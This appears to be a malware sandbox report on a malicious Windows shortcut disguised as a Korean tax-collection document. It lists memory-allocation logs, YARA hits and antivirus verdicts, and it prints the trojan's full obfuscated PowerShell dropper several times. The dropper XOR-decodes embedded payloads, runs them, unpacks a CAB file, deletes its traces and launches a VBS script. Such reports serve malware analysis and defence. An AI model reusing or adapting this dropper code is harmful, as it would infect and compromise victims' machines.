GlobalMemoryStatusEx Feb. 19, 2025, 3:19 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 164 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 2031616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0259a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02592000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0260a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0261b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02617000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0259b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02602000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02615000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0260c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0261c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02603000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02604000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02605000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02606000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02607000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02608000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02609000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a71000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a72000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a73000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a74000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a75000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a76000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a77000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a78000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a79000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b81000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b83000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:19 p.m.	process_identifier: 2436 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b84000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\소명자료 목록(국세징수법 시행규칙).hwp.lnk
file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (4 events)

cmdline	C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe \| findstr /i rshell.exe
cmdline	C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe "function oxidation{param($twenty); <#prosperity near#>$nurse = $twenty.substring(0,$twenty.length-4) + ''; <#clearing opponent#>return $nurse;};function boarding{param($malicious);<#adequate giving#> remove-item <#five mortify#> -path $malicious <#alphabet figured#> -force;};function waste{param($doubtful,$scarlet,$vocation,$emperor,$reply);<#variation flat#> $prayer=New-Object System.IO.FileStream(<#million argument#>$doubtful,<#porcelain excessive#>[System.IO.FileMode]::Open,<#gossip accuracy#>[System.IO.FileAccess]::Read);<#hastily preface#> $prayer.Seek(<#messenger brown#>$scarlet,[System.IO.SeekOrigin]::Begin);<#alarm honey#> $continent=$vocation0x01;<#count popular#> $forked=New-Object byte[] <#supported baptism#>$vocation; <#slope latter#> $verge=New-Object byte[] <#designation crush#>$continent; <#pendent pushing#>$prayer.Read(<#horse temperate#>$verge,0,<#ready clumsy#>$continent); $prayer.Close();$afford=0;while($afford -lt $vocation){<#indicate inference#>$forked[$afford]=$verge[$afford0x01] -bxor $emperor;$afford++;}<#scramble sect#> set-content $reply <#forbid wreath#> $forked -Encoding <#confused renew#> Byte;};function back{param($intelligence, $continued);<#succeed fast#> expand $intelligence <#fortify respiration#> -F:* $continued;};function defense{$triangle = $env:public<#above critical#> + '\' +<#straddle pound#> 'docu'+'me'+'nts';<#policy distinction#> return $triangle;};function prophecy{param($fasten); <#official obscene#>$street = Split-Path $fasten;<#preference technical#> return $street;};function steep{return Get-Location;};function decoration{<#undue wreck#>return $env:Temp;};function sometimes{$forehead = steep; $doublet = sever -century $forehead; <#again coarse#>if($doublet.length -eq 0) {$forehead = decoration; <#quadrant mechanical#>$doublet = sever -century $forehead;} return $doublet;};function collective{$chastity = $env:public<#remedy rubbish#> + '\' + 'ple'+'ase.'+'cab';<#bargain decline#> return $chastity;};function easily{$mood = $env:public<#melting coin#>+'\do'+'cume'+'nts'+'\s'+'ta'+'rt.v'+'bs';<#wagon composing#> return $mood;};function sever{param($century); <#compare studious#> $rudder=''; [System.IO.Directory]::GetFiles($century, '*.'+'ln'+'k', [System.IO.SearchOption]::AllDirectories) \| <#disgust solemn#>ForEach-Object { <#plaintiff widow#> $fifth = [System.IO.FileInfo]::new($_); <#ashes pick#> if ($fifth.Length -eq 0x0016050F) { <#eloquence camphor#> $rudder = $fifth.FullName;}}; return <#spongy disturbance#> $rudder;};$charitable = sometimes;<#sign soil#>$tremulous = prophecy -fasten $charitable;<#tilt bowsprit#> $possible = oxidation -twenty $charitable;waste -doubtful <#minor segment#> $charitable -scarlet <#essay neuter#> 0x00002134 -vocation 0x00006C00 -emperor <#juice season#> 0x2B -reply <#integral valve#> $possible;<#working turkish#> & $possible;$breach=collective;<#ready reclaim#>waste -doubtful <#lightning lathe#> $charitable -scarlet <#latitude removal#> 0x00008D34 -vocation <#flatter marshal#> 0x00013CDA -emperor <#vowel abundant#> 0x72 -reply <#extensive spirited#> $breach;<#lover forest#>boarding -malicious $charitable;$coffee = defense;<#near afford#>back -intelligence $breach -continued <#consult abnormal#>$coffee;<#hydrate nail#>boarding -malicious $breach;$tube = <#reservoir bark#>easily;<#republic turbulent#>& $tube;"
cmdline	C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe "
cmdline	"C:\Windows\system32\cmd.exe" /c for /f "tokens=" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\.exe ^\| findstr /i rshell.exe') do (if exist "%f" (%f "function oxidation{param($twenty); <#prosperity near#>$nurse = $twenty.substring(0,$twenty.length-4) + ''; <#clearing opponent#>return $nurse;};function boarding{param($malicious);<#adequate giving#> remove-item <#five mortify#> -path $malicious <#alphabet figured#> -force;};function waste{param($doubtful,$scarlet,$vocation,$emperor,$reply);<#variation flat#> $prayer=New-Object System.IO.FileStream(<#million argument#>$doubtful,<#porcelain excessive#>[System.IO.FileMode]::Open,<#gossip accuracy#>[System.IO.FileAccess]::Read);<#hastily preface#> $prayer.Seek(<#messenger brown#>$scarlet,[System.IO.SeekOrigin]::Begin);<#alarm honey#> $continent=$vocation0x01;<#count popular#> $forked=New-Object byte[] <#supported baptism#>$vocation; <#slope latter#> $verge=New-Object byte[] <#designation crush#>$continent; <#pendent pushing#>$prayer.Read(<#horse temperate#>$verge,0,<#ready clumsy#>$continent); $prayer.Close();$afford=0;while($afford -lt $vocation){<#indicate inference#>$forked[$afford]=$verge[$afford0x01] -bxor $emperor;$afford++;}<#scramble sect#> set-content $reply <#forbid wreath#> $forked -Encoding <#confused renew#> Byte;};function back{param($intelligence, $continued);<#succeed fast#> expand $intelligence <#fortify respiration#> -F:* $continued;};function defense{$triangle = $env:public<#above critical#> + '\' +<#straddle pound#> 'docu'+'me'+'nts';<#policy distinction#> return $triangle;};function prophecy{param($fasten); <#official obscene#>$street = Split-Path $fasten;<#preference technical#> return $street;};function steep{return Get-Location;};function decoration{<#undue wreck#>return $env:Temp;};function sometimes{$forehead = steep; $doublet = sever -century $forehead; <#again coarse#>if($doublet.length -eq 0) {$forehead = decoration; <#quadrant mechanical#>$doublet = sever -century $forehead;} return $doublet;};function collective{$chastity = $env:public<#remedy rubbish#> + '\' + 'ple'+'ase.'+'cab';<#bargain decline#> return $chastity;};function easily{$mood = $env:public<#melting coin#>+'\do'+'cume'+'nts'+'\s'+'ta'+'rt.v'+'bs';<#wagon composing#> return $mood;};function sever{param($century); <#compare studious#> $rudder=''; [System.IO.Directory]::GetFiles($century, '*.'+'ln'+'k', [System.IO.SearchOption]::AllDirectories) \| <#disgust solemn#>ForEach-Object { <#plaintiff widow#> $fifth = [System.IO.FileInfo]::new($_); <#ashes pick#> if ($fifth.Length -eq 0x0016050F) { <#eloquence camphor#> $rudder = $fifth.FullName;}}; return <#spongy disturbance#> $rudder;};$charitable = sometimes;<#sign soil#>$tremulous = prophecy -fasten $charitable;<#tilt bowsprit#> $possible = oxidation -twenty $charitable;waste -doubtful <#minor segment#> $charitable -scarlet <#essay neuter#> 0x00002134 -vocation 0x00006C00 -emperor <#juice season#> 0x2B -reply <#integral valve#> $possible;<#working turkish#> & $possible;$breach=collective;<#ready reclaim#>waste -doubtful <#lightning lathe#> $charitable -scarlet <#latitude removal#> 0x00008D34 -vocation <#flatter marshal#> 0x00013CDA -emperor <#vowel abundant#> 0x72 -reply <#extensive spirited#> $breach;<#lover forest#>boarding -malicious $charitable;$coffee = defense;<#near afford#>back -intelligence $breach -continued <#consult abnormal#>$coffee;<#hydrate nail#>boarding -malicious $breach;$tube = <#reservoir bark#>easily;<#republic turbulent#>& $tube;") )

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Feb. 19, 2025, 3:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe \| findstr /i rshell.exe
cmdline	C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe "
cmdline	"C:\Windows\system32\cmd.exe" /c for /f "tokens=" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\.exe ^\| findstr /i rshell.exe') do (if exist "%f" (%f "function oxidation{param($twenty); <#prosperity near#>$nurse = $twenty.substring(0,$twenty.length-4) + ''; <#clearing opponent#>return $nurse;};function boarding{param($malicious);<#adequate giving#> remove-item <#five mortify#> -path $malicious <#alphabet figured#> -force;};function waste{param($doubtful,$scarlet,$vocation,$emperor,$reply);<#variation flat#> $prayer=New-Object System.IO.FileStream(<#million argument#>$doubtful,<#porcelain excessive#>[System.IO.FileMode]::Open,<#gossip accuracy#>[System.IO.FileAccess]::Read);<#hastily preface#> $prayer.Seek(<#messenger brown#>$scarlet,[System.IO.SeekOrigin]::Begin);<#alarm honey#> $continent=$vocation0x01;<#count popular#> $forked=New-Object byte[] <#supported baptism#>$vocation; <#slope latter#> $verge=New-Object byte[] <#designation crush#>$continent; <#pendent pushing#>$prayer.Read(<#horse temperate#>$verge,0,<#ready clumsy#>$continent); $prayer.Close();$afford=0;while($afford -lt $vocation){<#indicate inference#>$forked[$afford]=$verge[$afford0x01] -bxor $emperor;$afford++;}<#scramble sect#> set-content $reply <#forbid wreath#> $forked -Encoding <#confused renew#> Byte;};function back{param($intelligence, $continued);<#succeed fast#> expand $intelligence <#fortify respiration#> -F:* $continued;};function defense{$triangle = $env:public<#above critical#> + '\' +<#straddle pound#> 'docu'+'me'+'nts';<#policy distinction#> return $triangle;};function prophecy{param($fasten); <#official obscene#>$street = Split-Path $fasten;<#preference technical#> return $street;};function steep{return Get-Location;};function decoration{<#undue wreck#>return $env:Temp;};function sometimes{$forehead = steep; $doublet = sever -century $forehead; <#again coarse#>if($doublet.length -eq 0) {$forehead = decoration; <#quadrant mechanical#>$doublet = sever -century $forehead;} return $doublet;};function collective{$chastity = $env:public<#remedy rubbish#> + '\' + 'ple'+'ase.'+'cab';<#bargain decline#> return $chastity;};function easily{$mood = $env:public<#melting coin#>+'\do'+'cume'+'nts'+'\s'+'ta'+'rt.v'+'bs';<#wagon composing#> return $mood;};function sever{param($century); <#compare studious#> $rudder=''; [System.IO.Directory]::GetFiles($century, '*.'+'ln'+'k', [System.IO.SearchOption]::AllDirectories) \| <#disgust solemn#>ForEach-Object { <#plaintiff widow#> $fifth = [System.IO.FileInfo]::new($_); <#ashes pick#> if ($fifth.Length -eq 0x0016050F) { <#eloquence camphor#> $rudder = $fifth.FullName;}}; return <#spongy disturbance#> $rudder;};$charitable = sometimes;<#sign soil#>$tremulous = prophecy -fasten $charitable;<#tilt bowsprit#> $possible = oxidation -twenty $charitable;waste -doubtful <#minor segment#> $charitable -scarlet <#essay neuter#> 0x00002134 -vocation 0x00006C00 -emperor <#juice season#> 0x2B -reply <#integral valve#> $possible;<#working turkish#> & $possible;$breach=collective;<#ready reclaim#>waste -doubtful <#lightning lathe#> $charitable -scarlet <#latitude removal#> 0x00008D34 -vocation <#flatter marshal#> 0x00013CDA -emperor <#vowel abundant#> 0x72 -reply <#extensive spirited#> $breach;<#lover forest#>boarding -malicious $charitable;$coffee = defense;<#near afford#>back -intelligence $breach -continued <#consult abnormal#>$coffee;<#hydrate nail#>boarding -malicious $breach;$tube = <#reservoir bark#>easily;<#republic turbulent#>& $tube;") )

Deletes executed files from disk (1 event)

file	C:\Users\Public\please.cab

File has been identified by 16 AntiVirus engines on VirusTotal as malicious (16 events)

CTX	lnk.trojan.powecom
Skyhigh	BehavesLike.Dropper.tx
Symantec	Scr.Mallnk!gen4
ESET-NOD32	LNK/Agent.AHE
Avast	LNK:Agent-HN [Trj]
Kaspersky	HEUR:Trojan.Multi.Powecom.a
Rising	Trojan.PSRunner/LNK!1.DB7E (CLASSIC)
Google	Detected
GData	Win32.Trojan.Agent.K9J4HI
AhnLab-V3	Dropper/LNK.Generic.S2899
VBA32	Trojan.Link.Crafted
Ikarus	Trojan.LNK.Agent
Tencent	Win32.Trojan.Powecom.Lcnw
Fortinet	LNK/Agent.AHE!tr
AVG	LNK:Agent-HN [Trj]
alibabacloud	Trojan:Win/Powecom.a

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

"C:\Windows\system32\expand.exe" C:\Users\Public\please.cab -F:* C:\Users\Public\documents

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2052 resumed a thread in remote process 2180
NtResumeThread Feb. 19, 2025, 3:19 p.m.	thread_handle: 0x000002ec suspend_count: 1 process_identifier: 2180	1	0	0

The process powershell.exe wrote an executable file to disk (1 event)

file	C:\Windows\System32\expand.exe

소명자료 목록(국세징수법 시행규칙).hwp.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All